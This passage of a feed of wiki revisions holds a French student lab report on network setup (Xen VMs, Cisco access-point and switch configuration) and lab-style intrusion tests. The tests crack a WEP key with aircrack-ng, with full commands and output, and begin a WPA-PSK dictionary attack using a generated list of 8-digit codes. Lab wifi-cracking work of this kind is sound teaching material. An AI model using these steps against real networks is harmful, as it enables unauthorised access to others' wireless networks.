 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Noter le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;br /&gt;
&lt;br /&gt;
- Visualiser les interfaces&lt;br /&gt;
 airodump-ng wlan0mon&lt;br /&gt;
&lt;br /&gt;
- Noter le SSID de la machine à attaquer :&lt;br /&gt;
 44:AD:D9:5F:87:02  -40        3        0    0   8  54e. WPA2 CCMP   PSK  kracotte03 &lt;br /&gt;
&lt;br /&gt;
- Coder un &amp;quot;dictionnaire&amp;quot; en C. On suppose que la clef WPA est un code de 8 chiffres :&lt;br /&gt;
 vim dico.c&lt;br /&gt;
&lt;br /&gt;
  int main(void){&lt;br /&gt;
	int x = 0;&lt;br /&gt;
	for(x=0; x&amp;lt;=99999999; x++){&lt;br /&gt;
		printf(&amp;quot;%08d\n&amp;quot;,x);&lt;br /&gt;
	}&lt;br /&gt;
&lt;br /&gt;
}&lt;br /&gt;
&lt;br /&gt;
- Compiler dico.c :&lt;br /&gt;
 gcc -Wall dico.c&lt;br /&gt;
&lt;br /&gt;
- Executer dico.c :&lt;br /&gt;
 ./a.out | more&lt;br /&gt;
&lt;br /&gt;
- Enregistrer le résultat du code dans un fichier txt :&lt;br /&gt;
 ./a.out &amp;gt; dico.txt&lt;br /&gt;
&lt;br /&gt;
- Lancer le traitement de lcrack-03 par dico.txt :&lt;br /&gt;
 aircrack-ng -w dico.txt lcrack-03&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56361</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56361"/>
				<updated>2021-11-12T11:38:25Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-03.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56358</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56358"/>
				<updated>2021-11-12T11:13:20Z</updated>
		
		<summary type="html">&lt;p&gt;Yhaloua1 : /* Tests d'intrusion */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&lt;br /&gt;
== Installation de la machine virtuelle ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Connexion sur le disque de virtualisation :'''&lt;br /&gt;
 su -&lt;br /&gt;
 ssh -4 capbreton.plil.info&lt;br /&gt;
&lt;br /&gt;
'''Installation dans la machine virtuelle Xen'''&lt;br /&gt;
&lt;br /&gt;
Création de la machine virtuelle :&lt;br /&gt;
 xen-create-image --hostname=Toad --ip=193.48.57.173 --gateway=193.48.57.174 --dir=/usr/local/xen --dist=buster&lt;br /&gt;
Veiller à noter le mot de passe de la MV à cette étape. Celui-ci peut-être retrouvé à l'aide de la commande :&lt;br /&gt;
 tail -f /var/log/xen-tools/Toad.log&lt;br /&gt;
Vérifier la création de la MV en se rendant sur les répertoires:&lt;br /&gt;
 ls /etc/xen&lt;br /&gt;
 ls /usr/local/xen&lt;br /&gt;
Pour les disques : configuration RAID 5&lt;br /&gt;
Administration de volume logique :&lt;br /&gt;
 lvcreate -L1G -n Toad1&lt;br /&gt;
 lvcreate -L1G -n Toad2&lt;br /&gt;
 lvcreate -L1G -n Toad3&lt;br /&gt;
 lvcreate -L1G -n Toad4&lt;br /&gt;
&lt;br /&gt;
Les volumes logiques sont par défaut de 1GiB.&lt;br /&gt;
Augmenter la taille des volumes logiques:&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad1&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad2&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad3&lt;br /&gt;
 lvextend -L +9G /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Vérifier avec :&lt;br /&gt;
 lvdisplay&lt;br /&gt;
&lt;br /&gt;
Créer un système de fichiers étendu :&lt;br /&gt;
 mke2fs /dev/virtual/Toad1&lt;br /&gt;
 mke2fs /dev/virtual/Toad2&lt;br /&gt;
 mke2fs /dev/virtual/Toad3&lt;br /&gt;
 mke2fs /dev/virtual/Toad4&lt;br /&gt;
&lt;br /&gt;
Création et modification du fichier de configuration :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
 vim Toad.cfg&lt;br /&gt;
&lt;br /&gt;
Dans Networking, supprimer l'@ IP et définir : &lt;br /&gt;
 bridge = IMA2a5&lt;br /&gt;
Pour prenndre en compte les disques créés dans la MV, dans '''disk''', ajouter :&lt;br /&gt;
 'phy:/dev/virtual/Toad1, xvda3, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad2, xvda4, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad3, xvda5, w'&lt;br /&gt;
 'phy:/dev/virtual/Toad4, xvda6, w'&lt;br /&gt;
&lt;br /&gt;
Lancer la MV avec la commande :&lt;br /&gt;
 xen create /etc/xen/Toad.cfg&lt;br /&gt;
&lt;br /&gt;
On peut vérifier que la MV est démarrée avec la commande :&lt;br /&gt;
 xl list&lt;br /&gt;
&lt;br /&gt;
Pour se connecter à la console de la MV :&lt;br /&gt;
 xen console Toad&lt;br /&gt;
Avec login : root et password : celui qui a été noté au début.&lt;br /&gt;
&lt;br /&gt;
Si besoin de changer le mot de passe :&lt;br /&gt;
 passwd root&lt;br /&gt;
&lt;br /&gt;
'''Configuration de la machine virtuelle'''&lt;br /&gt;
&lt;br /&gt;
Installer les packages dont nous avons besoin :&lt;br /&gt;
 apt-get update&lt;br /&gt;
&lt;br /&gt;
'''Configuration réseau'''&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
'''Configuration ssh'''&lt;br /&gt;
&lt;br /&gt;
== Passerelle capbreton ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Une passerelle doit être mise en place sur capbreton, pour relier les VM.&lt;br /&gt;
Il faut modifier le fichier interfaces :&lt;br /&gt;
&lt;br /&gt;
 nano /etc/network/interfaces&lt;br /&gt;
On identifie les ports ethernet sur lesquels nous sommes câblés :&lt;br /&gt;
 ethtool -p ether n&lt;br /&gt;
Avec n numéro de port. &lt;br /&gt;
&lt;br /&gt;
Nous sommes câblés sur les ports suivants :&lt;br /&gt;
- ether7 : fibré pour aller jusqu'au routeur 6509&lt;br /&gt;
- ether6 : fibré pour aller jusqu'au routeur 9200&lt;br /&gt;
&lt;br /&gt;
Configurer la passerelle comme ci-dessous :&lt;br /&gt;
 auto IMA2a5&lt;br /&gt;
 iface IMA2a5 inet manual&lt;br /&gt;
  bridge_ports eth6 eth7&lt;br /&gt;
 # Bridge for L3MRIT group&lt;br /&gt;
 #&lt;br /&gt;
&lt;br /&gt;
Déconfigurer, puis configurer l'interface réseau :&lt;br /&gt;
 ifdown IMA2a5&lt;br /&gt;
 ifup IMAa5&lt;br /&gt;
&lt;br /&gt;
Vérifier la configuration :&lt;br /&gt;
 brctl show&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration du point d'accés wifi ==&lt;br /&gt;
&lt;br /&gt;
'''Réinitialisation des paramètres de la borne wifi :'''&lt;br /&gt;
 erase startup config&lt;br /&gt;
 reload&lt;br /&gt;
&lt;br /&gt;
'''Configuration de base :'''&lt;br /&gt;
 ap&amp;gt;enable&lt;br /&gt;
 ap#configure terminal&lt;br /&gt;
&lt;br /&gt;
'''Configuration du nom d'hôte :'''&lt;br /&gt;
 ap(config)#hostname SE2A5-AP1&lt;br /&gt;
&lt;br /&gt;
'''Accès ssh :'''&lt;br /&gt;
 SE2A5-AP1(config)#aaa new-model&lt;br /&gt;
 SE2A5-AP1(config)#username admin privilege 15 secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#ip domain-name plil.info&lt;br /&gt;
 SE2A5-AP1(config)#crypto key generate rsa general-keys modulus 2048&lt;br /&gt;
 SE2A5-AP1(config)#ip ssh version 2&lt;br /&gt;
 SE2A5-AP1(config)#line vty 0 15&lt;br /&gt;
 SE2A5-AP1(config-line)#transport input ssh&lt;br /&gt;
 SE2A5-AP1(config-line)#exit&lt;br /&gt;
&lt;br /&gt;
'''Sécurisation des accès :'''&lt;br /&gt;
 SE2A5-AP1(config)#service password-encryption&lt;br /&gt;
 SE2A5-AP1(config)#enable secret glopglop&lt;br /&gt;
 SE2A5-AP1(config)#banner motd #Restricted Access#&lt;br /&gt;
&lt;br /&gt;
'''VLAN 173'''&lt;br /&gt;
 aaa authentication login EAP_TOAD group RADIUS_TOAD&lt;br /&gt;
 radius-server host 193.48.57.173 auth-port 1812 acct-port 1813 key glopglop&lt;br /&gt;
 aaa group server radius RADIUS_TOAD&lt;br /&gt;
 server 193.48.57.173 auth-port 1812 acct-port 1813&lt;br /&gt;
 exit&lt;br /&gt;
 dot11 ssid TOAD1&lt;br /&gt;
 mbssid guest-mode&lt;br /&gt;
 vlan 173&lt;br /&gt;
 authentication open eap EAP_TOAD&lt;br /&gt;
 authentication network-eap EAP_TOAD&lt;br /&gt;
 authentication key-management wpa&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface g0.173&lt;br /&gt;
 encapsulation dot1q 173&lt;br /&gt;
 bridge-group 73&lt;br /&gt;
 exit&lt;br /&gt;
 interface dot11radio 0&lt;br /&gt;
 no shutdown&lt;br /&gt;
 encryption vlan 173 mode ciphers aes-ccm tkip&lt;br /&gt;
 mbssid&lt;br /&gt;
 ssid TOAD1&lt;br /&gt;
 exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Configuration de la liaison routeur 3500 vers 9200 ==&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Afficher la liste des interfaces du routeur 3500 et leurs états :&lt;br /&gt;
 sh ip interface brief&lt;br /&gt;
On constate que le port G0/39 est désactivé pour le moment.&lt;br /&gt;
Il faut le relier au routeur 3500 via le VLAN 532.&lt;br /&gt;
&lt;br /&gt;
'''Configuration :'''&lt;br /&gt;
 configure t&lt;br /&gt;
 interface G0/39&lt;br /&gt;
 switchport access vlan 532&lt;br /&gt;
 switchport mode access&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
== Tests d'intrusion ==&lt;br /&gt;
'''Cassage de clef WEP d'un point d'accès WiFi'''&lt;br /&gt;
- Brancher une clef wifi sur le PC&lt;br /&gt;
&lt;br /&gt;
- Installer le paquet aircrack.ng&lt;br /&gt;
&lt;br /&gt;
- On peut lister les interfaces disponibles, en activant le mode moniteur de la carte réseau :&lt;br /&gt;
 airmon-ng&lt;br /&gt;
&lt;br /&gt;
- Passer la carte WiFi en mode moniteur, espion du réseau sans fil :&lt;br /&gt;
 airmon-ng start wlan0mon &lt;br /&gt;
wlan0mon est le nouveau nom de la carte réseau donné par défaut car le précédent est considéré comme trop long par la machine.&lt;br /&gt;
&lt;br /&gt;
- Obtenir les trames WiFi sur tous les canaux :&lt;br /&gt;
 airodump-ng --encrypt wep wlan0mon&lt;br /&gt;
- Notes le SSID de la machine à attaquer, ici cracotte03 : '''04:DA:D2:9C:50:53'''&lt;br /&gt;
&lt;br /&gt;
- Visulaiser les informations de cracotte03 : &lt;br /&gt;
 airodump-ng --channel 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
- Récupérer dans un fichier .cap toutes les données qui transitent sur le channel 3, uniquement les paquets échangés avec cracotte03 :&lt;br /&gt;
 airodump-ng -w lcrack -c 3 --bssid 04:DA:D2:9C:50:53 wlan0mon&lt;br /&gt;
J'attends qu'il y ai environ 30 000 trames de volées, ce processus prend un peu de temps.&lt;br /&gt;
- Lancer le décryptage de la clef WEP : &lt;br /&gt;
 aircrack-ng lcrack-01.cap&lt;br /&gt;
Résultat :&lt;br /&gt;
  &lt;br /&gt;
                                                                        [00:00:00] Tested 813 keys (got 74481 IVs)&lt;br /&gt;
   KB    depth   byte(vote)&lt;br /&gt;
    0    0/ 17   F1(96512) E7(85504) BD(84992) 6F(84736) F2(83968) FA(83712) 12(83456) 0E(82688) C8(82176) 6A(81920) 70(81664) 11(81408) 95(81408) E9(81408) 75(81152) &lt;br /&gt;
    1    0/  1   8E(105472) 34(86016) B3(84480) 54(84224) 2A(83456) B9(83456) 87(82688) 06(82432) 64(82432) 65(82176) 21(81920) 8D(81664) 61(81408) 2F(81152) 3C(81152) &lt;br /&gt;
    2    5/  2   7E(83968) 0E(82432) BF(82432) A2(82176) 0A(81920) 9C(81920) A8(81664) DF(81664) E2(81664) A7(81408) B4(81408) 33(80896) 58(80896) 90(80640) 16(80384) &lt;br /&gt;
    3   17/  3   5B(80896) B2(80640) 5A(80384) B1(80384) C4(80384) F6(79616) 03(79360) 33(79360) DA(79360) 73(79104) 9E(79104) 30(78848) 86(78848) AD(78848) D6(78848) &lt;br /&gt;
    4    0/  1   71(107008) 8D(86528) 03(83712) 7A(83712) 5E(83200) AF(82944) 50(82688) CF(82688) 54(82432) C0(82432) 21(82176) BE(81920) CB(81920) 1A(81664) B5(81408) &lt;br /&gt;
        KEY FOUND! [ F1:DE:D4:00:00:00:00:00:00:09:99:99:99 ] &lt;br /&gt;
        Decrypted correctly: 100%&lt;br /&gt;
&lt;br /&gt;
On constate que 813 clef ont été testées avant de trouver la bonne.&lt;br /&gt;
&lt;br /&gt;
'''Cassage de mot de passe WPA-PSK'''&lt;/div&gt;</summary>
		<author><name>Yhaloua1</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56357</id>
		<title>TP sysres IMA2a5 2021/2022 G13</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2021/2022_G13&amp;diff=56357"/>
				<updated>2021-11-12T11:09:22Z</updated>
		
